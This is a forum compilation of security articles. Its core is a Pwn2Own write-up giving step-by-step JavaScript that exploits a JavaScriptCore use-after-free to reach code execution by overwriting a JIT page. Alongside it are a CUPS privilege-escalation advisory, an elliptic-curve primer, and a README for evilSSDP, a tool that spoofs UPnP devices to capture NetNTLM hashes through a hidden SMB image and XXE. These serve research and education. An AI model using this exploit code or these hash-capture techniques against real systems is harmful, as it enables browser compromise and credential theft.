Support for .Net 2.0-3.5

Download

GitHub: https://github.com/nettitude/Invoke-PowerThIEf

Sursa: https://labs.nettitude.com/blog/com-and-the-powerthief/
  17. Weaponization of a JavaScriptCore Vulnerability Illustrating the Progression of Advanced Exploit Primitives In Practice July 11, 2018 / Nick Burnett, Patrick Biernat, Markus Gaasedelen Software bugs come in many shapes and sizes. Sometimes, these code defects (or ‘asymmetries’) can be used to compromise the runtime integrity of software. This distinction is what helps researchers separate simple reliability issues from security vulnerabilities. At the extreme, certain vulnerabilities can be weaponized by meticulously exacerbating such asymmetries to reach a state of catastrophic software failure: arbitrary code execution. In this post, we shed some light on the process of weaponizing a vulnerability (CVE-2018-4192) in the Safari Web Browser to achieve arbitrary code execution from a single click of an unsuspecting victim. This is the most frequently discussed topic of the exploit development lifecycle, and the fourth post in our Pwn2Own 2018 series. A weaponized version of CVE-2018-4192, executing arbitrary code against JavaScriptCore in early 2018 If you haven’t been following along, you can read about how we discovered this vulnerability, followed by a walkthrough of its root cause analysis. The very first post of this series provides a top level discussion of the full exploit chain. Exploit Primitives While developing exploits against hardened or otherwise complex software, it is often necessary to use one or more vulnerabilities to build what are known as ‘exploit primitives’. In layman’s terms, a primitive refers to an action that an attacker can perform to manipulate or disclose the application runtime (eg, memory) in an unintended way. As the building blocks of an exploit, primitives are used to compromise software integrity or bypass modern security mitigations through advanced (often arbitrary) modifications of runtime memory. It is not uncommon for an exploit to string together multiple primitives towards the ultimate goal of achieving arbitrary code execution. The metamorphosis of software vulnerabilities, by Joe Bialek & Matt Miller (Slides 6-10) In the general case, it is impractical (if not impossible) to defend real world applications against an attacker who can achieve an ‘Arbitrary Read/Write’ primitive. Arbitrary R/W implies an attacker can perform any number of reads or writes to the entire address space of the application’s runtime memory. While extremely powerful, an arbitrary R/W is a luxury and not always feasible (or necessary) for an exploit. But when present, it is widely recognized as the point from which total compromise (arbitrary code execution) is inevitable. Layering Primitives From an educational perspective, the JavaScriptCore exploit that we developed for Pwn2Own 2018 is a great illustration of what layering increasingly powerful primitives looks like in practice. Starting from the discovered vulnerability, we have broken our JSC exploit down into approximately six different phases from which we nurtured each of our exploit primitives from: Forcefully free a JSArray butterfly using our race condition vulnerability (UAF) Employ the freed butterfly to gain a relative Read/Write (R/W) primitive Create generic addrof(...) and fakeobj(...) 
exploit primitives using the relative R/W Use generic exploit primitives to build an arbitrary R/W primitive from a faked TypedArray Leverage our arbitrary R/W primitive to overwrite a Read/Write/Execute (RWX) JIT Page Execute arbitrary code from said JIT Page Each of these steps required us to study a number of different JavaScriptCore internals, learned through careful review of the WebKit source code, existing literature, and hands-on experimentation. We will cover some of these internals in this post, but mostly in the context of how they were leveraged to build our exploit primitives. UAF Target Selection From the last post, we learned that the discovered race condition could be used to prematurely free any type of JS object by putting it in an array, and calling array.reverse() at a critical moment. This can create a malformed runtime state in which a freed object may continue to be used in what is called ‘Use-After-Free’ (UAF). We can think of this ability to incorrectly free arbitrary JS objects (or their internal allocations) as a class-specific exploit primitive against JSC. The next step would be to identify an interesting object to target (and free). In exploit development, array-like structures that maintain an internal ‘length’ field are attractive to attackers. If a malicious actor can corrupt these dynamic length fields, they are often able to index the array far outside of its usual bounds, creating a more powerful exploit primitive. Corrupting a length field in an array-like structure can allow for Out-of-Bounds array manipulations Within JavaScriptCore, a particularly interesting and accessible construct that matches the pattern depicted above is the backing butterfly of a JSArray object. The butterfly is a structure used by JSC to store JS object properties and data (such as array elements), but it also maintains a length field to bound user access to its storage. As an example, the following gdb dump + diagram shows a JSArray with its backing store (a butterfly) that we have filled with floats (represented by 0x4141414141414141 …). The green fields depict the internally managed size fields of the backing butterfly: Dumping a JSArray, and depicting the relationship with its backing butterfly From the Phrack article Attacking JavaScript Engines (Section 1.2), Saleo describes butterflies in greater detail: “Internally, JSC stores both [JS object] properties and elements in the same memory region and stores a pointer to that region in the object itself. This pointer points to the middle of the region, properties are stored to the left of it (lower addresses) and elements to the right of it. There is also a small header located just before the pointed to address that contains the length of the element vector. This concept is called a “Butterfly” since the values expand to the left and right, similar to the wings of a butterfly.” In the next section, we will attempt to forcefully free a butterfly using our vulnerability. This will leave a dangling butterfly pointer within a live JSArray, prone to malicious re-use (UAF). 
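One quick aside before that: the float arrays used below are filled with doubles whose raw bit patterns spell out recognizable 64-bit values (0x4141414141414141 and friends), since a JavaScript number is just an IEEE-754 double. The following helper (a convenience snippet added here, not part of the original PoC) converts between the two representations:

# Convert between a Python float (IEEE-754 double) and its raw 64-bit pattern.
import struct

def double_to_u64(d):
    return struct.unpack("<Q", struct.pack("<d", d))[0]

def u64_to_double(v):
    return struct.unpack("<d", struct.pack("<Q", v))[0]

print(hex(double_to_u64(2261634.5098039214)))   # -> 0x4141414141414141
print(u64_to_double(0x4242424242424242))        # -> 156842099844.51764 (used later)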
Forcing a Useful UAF

Due to the somewhat chaotic nature of our race-condition, we will want to start our exploit (written in JavaScript) by constructing a top level array that contains a large number of simple ‘float arrays’ to better our chances of freeing at least one of them (eg, ‘winning the race’):

print("Initializing arrays...");
var someArray1 = Array(1024);
for (var i = 0; i < someArray1.length; i++)
    someArray1[i] = new Array(128).fill(2261634.5098039214) // 0x41414141…
...

Note that the use of floats is somewhat common in browser exploits because they are one of the few native 64bit JS types. It allows one to read or write arbitrary 64bit values (contiguously) to the backing array butterfly, which will be more relevant later on in this post.

With our target arrays allocated as elements of someArray1, we attempt to trigger the race condition through repeated use of array.reverse(), and stimulation of the GC (to help schedule mark-and-sweeps):

...
print("Starting race...");
v = []
for (var i = 0; i < 506; i++) {
    for(var j = 0; j < 0x20; j++)
        someArray1.reverse()
    v.push(new String("C").repeat(0x10000)) // stimulate the GC
}
...

If successful, we expect to have freed one or more of the backing butterflies used by the float arrays stored within someArray1. Visually, our results will look something like this: the race condition will free some butterflies on the heap, while leaving their JSArray cells intact.

While driving the race condition, the JSArray v will eventually grow its backing butterfly (through pushes) such that its backing butterfly can get allocated over some of the freed butterfly allocations. The backing butterfly for ‘v’ should eventually get re-allocated over some of the freed butterflies.

To confirm this hypothesis, we can inspect all the lengths of arrays we targeted with our race condition. If successful, we expect to find one or more arrays with an abnormal length. This is an indication that the butterfly has been freed, and it is now a dangling pointer into memory owned by a new object (specifically, v):

...
print("Checking for abnormal array lengths...");
for (var i = 0; i < someArray1.length; i++) {
    if(someArray1[i].length == 128) // ignore arrays of expected length...
        continue;
    print('len: 0x' + someArray1[i].length.toString(16));
}

The snippets provided in this section make up a new Proof-of-Concept (PoC) called x.js. Running this short script a few times, it can be observed that the vulnerability is pretty reliably reporting multiple JSArrays with abnormal lengths. This is evidence that the backing butterflies for some of our arrays have been freed through the race condition, losing ownership of their underlying data (which now belongs to v). The PoC prints abnormal array lengths found during each run, implying potentially unbounded (malformed) arrays.

Explicitly, we have used the race condition to force a UAF of one or more (random) JSArray butterflies, and now the dangling butterfly pointers are pointing at unknown data. We have used our race condition to overlay a larger (living) allocation v with one or more freed butterflies. From this point, it is easy to demonstrate full control over the ‘abnormal’ array lengths teased above to achieve what is known as a ‘relative R/W’ exploit primitive.

Relative R/W Primitive

By filling the larger overlayed butterfly v with arbitrary data (in this case, floats), we are able to inadvertently set the ‘length’ property pointed at by one or more of the freed JSArray butterflies.
The code for this is only one additional line inserted into our PoC (v.fill(...)). Putting it all together, this is approximately what we have sketched out so far: print("Initializing arrays..."); var someArray1 = Array(1024); for (var i = 0; i < someArray1.length; i++) someArray1[i] = new Array(128).fill(2261634.5098039214) // 0x41414141... print("Starting race..."); v = [] for (var i = 0; i < 506; i++) { for(var j = 0; j < 0x20; j++) someArray1.reverse() v.push(new String("C").repeat(0x10000)) // stimulate the GC } print("Filling overlapping butterfly with 0x42424242..."); v.fill(156842099844.51764) print("Checking for abnormal array lengths..."); for (var i = 0; i < someArray1.length; i++) { if(someArray1[i].length == 128) // ignore arrays of expected length... continue; print('len: 0x' + someArray1[i].length.toString(16)); } Executing this new PoC a few times, we reliably see multiple arrays claiming to have an array length of 0x42424242. A corrupted or otherwise radically incorrect array length should be alarming to any developer. The PoC reliably printing multiple arrays with an attacker-controlled (unbounded) length These ‘malformed’ (dangling) array butterflies are no longer bounded by a valid length. By pulling one of these malformed JSArray objects out of someArray1 and using them as one normally would, we can now index far past their ‘expected’ length to read or write nearby (relative) heap memory. // pull out one of the arrays with an 'abnormal' length oob_array = someArray1[i]; // write the value 0x41414141 to array index 999999 (Out-of-Bounds Write) oob_array[999999] = 0x41414141; // read memory from index 987654321 of the array (Out-of-Bounds Read) print(oob_array[987654321]); Being able to read or write Out-of-Bounds (OOB) is an extremely powerful exploit primitive. As an attacker, we can now peek and poke at other parts of runtime memory almost as if we were using a debugger. We have effectively broken the fourth wall of the application runtime. Limitations of a Relative R/W Unfortunately, there are several factors inherent to JSArrays that limit the utility of the relative R/W primitive we established in the previous section. Chief among these limitations is that the length attribute of the JSArray is stored and used as a 32-bit signed integer. This is a problem because it means we can only index ‘forwards’ out of bounds, to read or write heap data that is close behind our butterfly. This leaves a significant portion of runtime memory inaccessible to our relative R/W primitive. // relative access limited 0-0x7FFFFFFF forward from malformed array print(oob_array[-1]); // bad index (undefined) print(oob_array[0]); // okay print(oob_array[10000000]); // okay print(oob_array[0x7FFFFFFF]); // okay print(oob_array[0xFFFFFFFF]); // bad index (undefined) print(oob_array[0xFFFFFFFFFFF]); // bad index (undefined) Our next goal is to build up to an arbitrary R/W primitive such that we can touch memory anywhere in the 64bit address space of the application runtime. With JavaScriptCore, there are a few different documented techniques to achieve this level of ubiquity which we will discuss in the next section. Utility of TypedArrays In the JavaScript language specification, there is a family of objects called TypedArrays. These are array-like objects that allow JS developers to exercise more precise & efficient control over memory through lower level data types. 
TypedArrays were added to JavaScript to facilitate scripts which perform audio, video, and image manipulation from within the browser. It is both more natural and performant to implement these types of computations with direct memory manipulation or storage. For these same reasons, TypedArrays are often an interesting tool for exploit writers. The structure of a TypedArray (in the context of JavaScriptCore) is comprised of the following components: A JSCell, similar to all other JSObjects A unused Butterfly pointer field A pointer to the underlying ‘backing store’ for TypedArray data Backing store length Mode flags Critically, the backing store is where the user data stored into a TypedArray object is actually located in memory. If we can overwrite a TypedArray’s backing store pointer, it can be pointed at any address in memory. A diagram of the TypedArray JSObject in memory, with its underlying backing store The simplest way to achieve arbitrary R/W would be to allocate a TypedArray object somewhere after our malformed JSArray, and then use our relative R/W to modify the backing store pointer to an address of our choosing. By reading or writing to index 0 of the TypedArray, we will interface with the memory at the specified address directly. Arbitrary R/W can be achieved by overwriting the backing store pointer within a TypedArray With little time to study the JSC heap & garbage collector algorithms, it proved difficult for us to place a TypedArray near our relative R/W through pure heap feng-shui. Instead, we employed documented exploitation techniques to create a ‘fake’ TypedArray and achieve the same result. Generic Exploit Primitives Faking our own TypedArray requires more work than a lucky heap allocation, but it should be significantly more reliable (and deterministic) in practice. The ability to craft fake JS objects is dependent on two higher level ‘generic’ exploit primitives that we must build using our relative R/W: addrof(...) to provide us the memory address of any javascript object we give it fakeobj(...) to take a memory address, and return a javascript object at that location. To create our addrof(...) primitive, we first create a normal JSArray (oob_target) whose butterfly is located after our corrupted JSArray butterfly (the relative R/W). From JavaScript, we can then place any object into the first index of the array [A] and then use our relative R/W primitive oob_array to read the address of the stored object pointer (as a float) out of the nearby array (oob_target). Decoding the float in IEEE 754 form gives us the JSObject’s address in memory : // Get the address of a given JSObject prims.addrof = function(x) { oob_target[0] = x; // [A] return Int64.fromDouble(oob_array[oob_target_index]); // [B] } By doing the reverse, we can establish our fakeobj(...) primitive. This was achieved by using our relative R/W (oob_array) to write a given address into the oob_target array butterfly (as a float) [C]. Reading that array index from JavaScript will return a JSObject for the pointer we stored [D]: // Return a JSObject at a given address prims.fakeobj = function(addr) { oob_array[oob_target_index] = addr.asDouble(); // [C] return oob_target[0]; // [D] } Using our relative R/W primitive, we have created some higher level generic exploit primitives that will help us in creating fake JavaScript objects. It is almost as if we have extended the JavaScript engine with new features! 
Next, we will demonstrate how these two new primitives can be used to help build a fake TypedArray object. This is what will lead us to achieve a true arbitrary R/W primitive. Arbitrary R/W Primitive Our process of creating a fake TypedArray is taken directly from the techniques shared in the phrack article previously referenced in this post. To be comprehensive, we discuss our use of these methods. To simplify the process of creating a fake TypedArray, we constructed it ‘inside’ a standard JSObject. The ‘container’ object we created was of the form: let utarget = new Uint8Array(0x10000); utarget[0] = 0x41; // Our fake array // Structure id guess is 0x200 // [ Indexing type = 0 ][ m_type = 0x27 (float array) ][ m_flags = 0x18 (OverridesGetOwnPropertySlot) ][ m_cellState = 1 (NewWhite)] let jscell = new Int64('0x0118270000000200'); // Construct the object // Each attribute will set 8 bytes of the fake object inline obj = { // JSCell 'a': jscell.asDouble(), // Butterfly can be anything (unused) 'b': false, // Target we want to write to (the 'backing store' field) 'c': utarget, // Length and flags 'd': new Int64('0x0001000000000010').asDouble() }; Using a JSObject in this way makes it easy for us to set or modify any of the objects contents at will. For example, we can easily point the ‘backing store’ (our arbitrary R/W) at any JS object by placing it in the ‘BackingStore’ mock field. Of these items, the JSCell is the most complex to fake. Specifically, the structureID field of JSCells is problematic. At runtime, JSC generates a unique structureID for each class of JavaScript objects. This ID is used by the engine to determine the object type, how it should be handled, and all of its attributes. At runtime, we don’t know what the structureID is for a TypedArray. To get around this issue, we need some way to help ensure that we can “guess” a valid structureID for the type of object we want. Due to some low-level concepts inherent to JavaScriptCore, if we create a TypedArray object, then add at least one custom attribute to it, JavaScriptCore will assign it a unique structureID. We abused this fact to ‘spray’ these ids, making it fairly likely that we could reliably guess an id (say, 0x200) that corresponded to a TypedArray. // Here we will spray structure IDs for Float64Arrays // See http://www.phrack.org/papers/attacking_javascript_engines.html function sprayStructures() { function randomString() { return Math.random().toString(36).replace(/[^a-z]+/g, '').substr(0, 5); } // Spray arrays for structure id for (let i = 0; i < 0x1000; i++) { let a = new Float64Array(1); // Add a new property to create a new Structure instance. a[randomString()] = 1337; structs.push(a); } } After spraying a large number of TypedArray IDs, we created a fake TypedArray and guessed a reasonable value for its structureID. We can safely ‘check’ if we guessed correctly by calling instanceOf on the fake TypedArray object. If instanceof returned Float64Array, we knew we had created a ‘valid-enough’ TypedArray object! At this point, we have access to a fake TypedArray from JavaScript, while simultaneously having control over its backing store pointer through utarget. Manipulating the backing store pointer of this TypedArray grants us full read-write access to the entire address space of the process. 
// Set data at a given address prims.set = function(addr, arr) { fakearray[2] = addr.asDouble(); utarget.set(arr); } // Read 8 bytes as an Int64 at a given address prims.read64 = function(addr) { fakearray[2] = addr.asDouble(); let bytes = Array(8); for (let i=0; i<8; i++) { bytes[i] = utarget[i]; } return new Int64(bytes); } // Write an Int64 as 8 bytes at a given address prims.write64 = function(addr, value) { fakearray[2] = addr.asDouble(); utarget.set(value.bytes); } With our arbitrary R/W capability in hand, we can work towards our final goal: arbitrary code execution. Arbitrary Code Execution On MacOS, Safari/JavaScriptCore still uses Read/Write/Execute (RWX) JIT pages. To achieve code execution, we can simply locate one of these RWX JIT pages and overwrite it with our own shellcode. The first step is to find a pointer to one of these JIT pages. To do this, we created a JavaScript function object and used it a few times. This ensures the function object would have its logic compiled down to machine code, and assigned a region in the RWX JIT pages: // Build an arbitrary JIT function // This was basically just random junk to make the JIT function larger let jit = function(x) { var j = []; j[0] = 0x6323634; return x*5 + x - x*x /0x2342513426 +(x-x+0x85720642*(x+3-x / x+0x41424344)/0x41424344)+j[0]; }; // Make sure the JIT function has been compiled jit(); jit(); jit(); ... We then used our arbitrary R/W primitive and addrof(...) to inspect the function object jit. Traditionally, the object’s RWX JIT page pointer can be found somewhere within the function object. In early January, a ‘pointer poisoning’ patch was introduced into JavaScriptCore to mitigate the Spectre CPU side-channel issues. This was not designed to hide pointers from an attacker with arbitrary R/W, but we are now required to dig a bit deeper through the object for an un-poisoned JIT pointer. // Traverse the JSFunction object to retrieve a non-poisoned pointer log("Finding jitpage"); let jitaddr = prims.read64( prims.read64( prims.read64( prims.read64( prims.addrof(jit).add(3*8) ).add(3*8) ).add(3*8) ).add(5*8) ); log("Jit page addr = "+jitaddr); ... Now that we have a pointer to a RWX JIT page, we can simply plug it into the backing store field of our fake TypedArray and write to it (arbitrary write). The final caveat we have to be mindful of is the size of our shellcode payload. If we copy too much code, we may inadvertently ‘smash’ through other JIT’d functions with our arbitrary write, introducing undesirable instability. shellcode = [0xcc, 0xcc, 0xcc, 0xcc] // Overwrite the JIT code with our INT3s log("Writing shellcode over jit page"); prims.set(jitaddr.add(32), shellcode); ... To gain code execution, we simply call the corresponding function object from JavaScript. // Call the JIT function to execute our shellcode log("Calling jit function"); jit(); Running the full exploit against JSC release, we can see that our Trace / Breakpoint (cc shellcode) is being executed. This implies we have achieved arbitrary code execution. The final exploit demonstrating arbitrary code execution against a release build of JavaScriptCore on Ubuntu 16.04 Having completed the exploit, with a little more work an attacker could embed this JavaScript in any website to pop vulnerable versions of Safari. Given more research & development time, this vulnerability could probably be exploited with a >99% success rate. 
The last step involves wrapping this JavaScript based exploit in HTML, and tuning timing and figures slightly such that it works more reliably when targeting Apple Safari running on real Mac hardware. A victim could experience complete compromise of their browser by simply clicking the wrong link, or navigating to a malicious website. Conclusion With little prior knowledge of JavaScriptCore, this vulnerability took approximately 100 man-hours to study, weaponize, and stabilize from discovery. In our testing leading up to Pwn2Own 2018, we measured the success rate of our Safari exploit at approximately 95% across 1000+ runs on a 13 inch, i5, 2017 MacBook Pro that we bought for testing. At Pwn2Own 2018, the JSC exploit landed successfully against a 13 inch, i7, 2017 MacBook Pro on three of four attempts, with the race condition failing entirely on the second attempt (possibly exacerbated by the i7). The next step in the zero-day chain is escaping the Safari sandbox to compromise the entire machine. In the next post, we will discuss our process of evaluating the sandbox to identify a vulnerability that led to a root level privilege escalation against the system. Sursa: https://blog.ret2.io/2018/07/11/pwn2own-2018-jsc-exploit/
  18. Introducing Elliptic Curves Posted on February 8, 2014 by j2kun With all the recent revelations of government spying and backdoors into cryptographic standards, I am starting to disagree with the argument that you should never roll your own cryptography. Of course there are massive pitfalls and very few people actually need home-brewed cryptography, but history has made it clear that blindly accepting the word of the experts is not an acceptable course of action. What we really need is more understanding of cryptography, and implementing the algorithms yourself is the best way to do that. [1] For example, the crypto community is quickly moving away from the RSA standard (which we covered in this blog post). Why? It turns out that people are getting just good enough at factoring integers that secure key sizes are getting too big to be efficient. Many experts have been calling for the security industry to switch to Elliptic Curve Cryptography (ECC), because, as we’ll see, the problem appears to be more complex and hence achieves higher security with smaller keys. Considering the known backdoors placed by the NSA into certain ECC standards, elliptic curve cryptography is a hot contemporary issue. If nothing else, understanding elliptic curves allows one to understand the existing backdoor. I’ve seen some elliptic curve primers floating around with all the recent talk of cryptography, but very few of them seem to give an adequate technical description [2], and legible implementations designed to explain ECC algorithms aren’t easy to find (I haven’t found any). So in this series of posts we’re going to get knee deep in a mess of elliptic curves and write a full implementation. If you want motivation for elliptic curves, or if you want to understand how to implement your own ECC, or you want to understand the nuts and bolts of an existing implementation, or you want to know some of the major open problems in the theory of elliptic curves, this series is for you. The series will have the following parts: Elliptic curves as elementary equations The algebraic structure of elliptic curves Points on elliptic curves as Python objects Elliptic curves over finite fields Finite fields primer (just mathematics) Programming with finite fields Back to elliptic curves Diffie-Hellman key exchange Shamir-Massey-Omura encryption and Digital Signatures Along the way we’ll survey a host of mathematical topics as needed, including group theory, projective geometry, and the theory of cryptographic security. We won’t assume any familiarity with these topics ahead of time, but we do intend to develop some maturity through the post without giving full courses on the side-topics. When appropriate, we’ll refer to the relevant parts of the many primers this blog offers. A list of the posts in the series (as they are published) can be found on the Main Content page. And as usual all programs produced in the making of this series will be available on this blog’s Github page. For anyone looking for deeper mathematical information about elliptic curves (more than just cryptography), you should check out the standard book, The Arithmetic of Elliptic Curves. 
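As a small preview of where the series is headed (this sketch is added here for illustration and is not code from the series), the elliptic curve group law over a finite field fits in a dozen lines of Python:

# Toy example: the group law on y^2 = x^3 + 2x + 3 over GF(97).
p, a, b = 97, 2, 3

def add(P, Q):
    if P is None: return Q        # None plays the role of the point at infinity
    if Q is None: return P
    (x1, y1), (x2, y2) = P, Q
    if x1 == x2 and (y1 + y2) % p == 0:
        return None               # P + (-P) = identity
    if P == Q:
        s = (3 * x1 * x1 + a) * pow(2 * y1, -1, p) % p   # tangent slope (Python 3.8+ inverse)
    else:
        s = (y2 - y1) * pow(x2 - x1, -1, p) % p          # chord slope
    x3 = (s * s - x1 - x2) % p
    y3 = (s * (x1 - x3) - y1) % p
    return (x3, y3)

P = (3, 6)                                    # on the curve: 6^2 = 3^3 + 2*3 + 3 = 36 (mod 97)
Q = add(P, P)
assert (Q[1] ** 2 - (Q[0] ** 3 + a * Q[0] + b)) % p == 0   # 2P is still on the curve
print("2P =", Q)

The series builds this up carefully from the elementary equations, so treat the above only as a taste of the style of code to come.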
[1] Okay, what people usually mean is that you shouldn’t use your own cryptography for things that actually matter, but I think a lot of the warnings are interpreted or extended to, “Don’t bother implementing cryptographic algorithms, just understand them at a fuzzy high level.” I imagine this results in fewer resources for people looking to learn cryptography and the mathematics behind it, and at least it prohibits them from appreciating how much really goes into an industry-strength solution. And this mindset is what made the NSA backdoor so easy: the devil was in the details. ↑ [2] From my heavily biased standpoint as a mathematician. ↑ Sursa: https://jeremykun.com/2014/02/08/introducing-elliptic-curves/
  19. CUPS Local Privilege Escalation and Sandbox Escapes Wednesday, July 11, 2018 at 7:25PM Gotham Digital Science has discovered multiple vulnerabilities in Apple’s CUPS print system affecting macOS 10.13.4 and earlier and multiple Linux distributions. All information in this post has been shared with Apple and other affected vendors prior to publication as part of the coordinated disclosure process. All code is excerpted from Apple’s open source CUPS repository located at https://github.com/apple/cups The vulnerabilities allow for local privilege escalation to root (CVE-2018-4180), multiple sandbox escapes (CVE-2018-4182 and CVE-2018-4183), and unsandboxed root-level local file reads (CVE-2018-4181). A related AppArmor-specific sandbox escape (CVE-2018-6553) was also discovered affecting Linux distributions such as Debian and Ubuntu. When chained together, these vulnerabilities allow an unprivileged local attacker to escalate to unsandboxed root privileges on affected systems. Affected Linux systems include those that allow non-root users to modify cupsd.conf such as Debian and Ubuntu. Redhat and related distributions are generally not vulnerable by default. Consult distribution-specific documentation and security advisories for more information. The vulnerabilities were patched in macOS 10.13.5, and patches are currently available for Debian and Ubuntu systems. GDS would like to thank Apple, Debian, and Canonical for working to patch the vulnerabilities, and CERT for assisting in vendor coordination. Sursa: https://blog.gdssecurity.com/labs/2018/7/11/cups-local-privilege-escalation-and-sandbox-escapes.html
  20. Overview This tool responds to SSDP multicast discover requests, posing as a generic UPNP device on a local network. Your spoofed device will magically appear in Windows Explorer on machines in your local network. Users who are tempted to open the device are shown a configurable webpage. By default, this page will load a hidden image over SMB, allowing you to capture or relay the NetNTLM challenge/response. This works against Windows 10 systems (even if they have disabled NETBIOS and LLMNR) and requires no existing credentials to execute. As a bonus, this tool can also detect and exploit potential zero-day vulnerabilities in the XML parsing engines of applications using SSDP/UPNP. To try this, use the 'xxe-smb' template. If a vulnerable device is found, it will alert you in the UI and then mount your SMB share with NO USER INTERACTION required via an XML External Entity (XXE) attack. If you get lucky and find one of those, you can probably snag yourself a nice snazzy CVE (please reference evilSSDP in the disclosure if you do). Demo Video Usage A typical run looks like this: essdp.py eth0 You need to provide the network interface at a minimum. The interface is used for both the UDP SSDP interaction as well as hosting a web server for the XML files and phishing page. The port is used only for the web server and defaults to 8888. The tool will automatically inject an IMG tag into the phishing page using the IP of the interface you provide. To work with hashes, you'll need to launch an SMB server at that interface (like Impacket). This address can be customized with the -s option. You do NOT need to edit the variables in the template files - the tool will do this automatically. You can choose between the included templates in the "templates" folder or build your own simply by duplicating an existing folder and editing the files inside. This allows you to customize the device name, the phishing contents page, or even build a totally new type of UPNP device that I haven't created yet. usage: essdp.py [-h] [-p PORT] [-t TEMPLATE] interface positional arguments: interface Network interface to listen on. optional arguments: -h, --help show this help message and exit -p PORT, --port PORT Port for HTTP server. Defaults to 8888. -t TEMPLATE, --template TEMPLATE Name of a folder in the templates directory. Defaults to "password-vault". This will determine xml and phishing pages used. -s SMB, --smb SMB IP address of your SMB server. Defalts to the primary address of the "interface" provided. Templates The following templates come with the tool. If you have good design skills, please contribute one of your own! bitcoin: Will show up in Windows Explorer as "Bitcoin Wallet". Phishing page is just a random set of Bitcoin private/public/address info. There are no actual funds in these accounts. password-vault: Will show up in Windows Explorer as "IT Password Vault". Phishing page contains a short list of fake passwords / ssh keys / etc. xxe-smb: Will not likely show up in Windows Explorer. Used for finding zero day vulnerabilities in XML parsers. Will trigger an "XXE - VULN" alert in the UI for hits and will attempt to force clients to authenticate with the SMB server, with 0 interaction. xxe-exfil: Another example of searching for XXE vulnerabilities, but this time attempting to exfiltrate a test file from a Windows host. Of course you can customize this to look for whatever specific file you are after, Windows or Linux. 
In the vulnerable applications I've discovered, exfiltration works only on a file with no whitespace or line breaks. This is due to how it is injected into the URL of a GET request. If you get this working on multi-line files, PLEASE let me know how you did it.

Technical Details

Simple Service Discovery Protocol (SSDP) is used by operating systems (Windows, macOS, Linux, iOS, Android, etc.) and applications (Spotify, YouTube, etc.) to discover shared devices on a local network. It is the foundation for discovering and advertising Universal Plug & Play (UPNP) devices. Devices attempting to discover shared network resources will send a UDP multicast out to 239.255.255.250 on port 1900. The source port is randomized. An example request looks like this:

M-SEARCH * HTTP/1.1
Host: 239.255.255.250:1900
ST: upnp:rootdevice
Man: "ssdp:discover"
MX: 3

To interact with this host, we need to capture both the source port and the 'ST' (Service Type) header. The response MUST be sent to the correct source port and SHOULD include the correct ST header. Note that it is not just the Windows OS looking for devices - scanning a typical network will show a large number of requests from applications inside the OS (like Spotify), mobile phones, and other media devices. Windows will only play ball if you reply with the correct ST; other sources are more lenient. evilSSDP will extract the requested ST and send a response like the following:

HTTP/1.1 200 OK
CACHE-CONTROL: max-age=1800
DATE: Tue, 26 Jun 2018 01:06:26 GMT
EXT:
LOCATION: http://192.168.1.131:8888/ssdp/device-desc.xml
SERVER: Linux/3.10.96+, UPnP/1.0, eSSDP/0.1
ST: upnp:rootdevice
USN: uuid:e415ce0a-3e62-22d0-ad3f-42ec42e36563:upnp-rootdevice
BOOTID.UPNP.ORG: 0
CONFIGID.UPNP.ORG: 1

The location IP, ST, and date are constructed dynamically. This tells the requestor where to find more information about our device. Here, we are forcing Windows (and other requestors) to access our 'Device Descriptor' XML file and parse it. The USN is just a random string and needs only to be unique and formatted properly. evilSSDP will pull the 'device.xml' file from the chosen templates folder and dynamically plug in some variables such as your IP address. This 'Device Descriptor' file is where you can customize some juicy-sounding friendly names and descriptions. It looks like this:

<root>
  <specVersion>
    <major>1</major>
    <minor>0</minor>
  </specVersion>
  <device>
    <deviceType>urn:schemas-upnp-org:device:Basic:1</deviceType>
    <friendlyName>IT Password Vault</friendlyName>
    <manufacturer>PasSecure</manufacturer>
    <manufacturerURL>http://passecure.com</manufacturerURL>
    <modelDescription>Corporate Password Repository</modelDescription>
    <modelName>Core</modelName>
    <modelNumber>1337</modelNumber>
    <modelURL>http://passsecure.com/1337</modelURL>
    <serialNumber>1337</serialNumber>
    <UDN>uuid:e415ce0a-3e62-22d0-ad3f-42ec42e36563</UDN>
    <serviceList>
      <service>
        <URLBase>http://$localIp:$localPort</URLBase>
        <serviceType>urn:ecorp.co:service:ePNP:1</serviceType>
        <serviceId>urn:epnp.ecorp.co:serviceId:ePNP</serviceId>
        <controlURL>/epnp</controlURL>
        <eventSubURL/>
        <SCPDURL>/service-desc.xml</SCPDURL>
      </service>
    </serviceList>
    <presentationURL>http://$localIp:$localPort/present.html</presentationURL>
  </device>
</root>

A key line in this file contains the 'Presentation URL'. This is what will load in a user's browser if they decide to manually double-click on the UPNP device.
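To make the discovery exchange above concrete, here is a minimal, hedged Python sketch of an SSDP responder (an illustration of the protocol only, not the evilSSDP implementation; the LOCATION URL, SERVER string and USN are placeholder values taken from the example response above):

import socket

MCAST_GRP, MCAST_PORT = "239.255.255.250", 1900
LOCATION = "http://192.168.1.131:8888/ssdp/device-desc.xml"   # placeholder URL

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(("", MCAST_PORT))
mreq = socket.inet_aton(MCAST_GRP) + socket.inet_aton("0.0.0.0")
sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)

while True:
    data, addr = sock.recvfrom(1024)               # addr carries the requester's random source port
    if b"M-SEARCH" not in data:
        continue
    st = "upnp:rootdevice"
    for line in data.decode(errors="ignore").splitlines():
        if line.lower().startswith("st:"):
            st = line.split(":", 1)[1].strip()     # echo back the requested Service Type
    reply = ("HTTP/1.1 200 OK\r\n"
             "CACHE-CONTROL: max-age=1800\r\n"
             "EXT:\r\n"
             "LOCATION: " + LOCATION + "\r\n"
             "SERVER: Linux/3.10.96+, UPnP/1.0, eSSDP/0.1\r\n"
             "ST: " + st + "\r\n"
             "USN: uuid:e415ce0a-3e62-22d0-ad3f-42ec42e36563::upnp:rootdevice\r\n\r\n")
    sock.sendto(reply.encode(), addr)              # the reply must go back to that source port

Pointing LOCATION at a web server that returns a device descriptor like the one above is enough for the spoofed device to appear to requestors that accept the echoed ST.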
evilSSDP will host this file automatically (present.html from the chosen template folder), plugging your source IP address into an IMG tag to access an SMB share that you can host with tools like Impacket, Responder, or Metasploit. The IMG tag looks like this:

<img src="file://///$localIp/smb/hash.jpg" style="display: none;" /><br>

Zero-Day Hunting

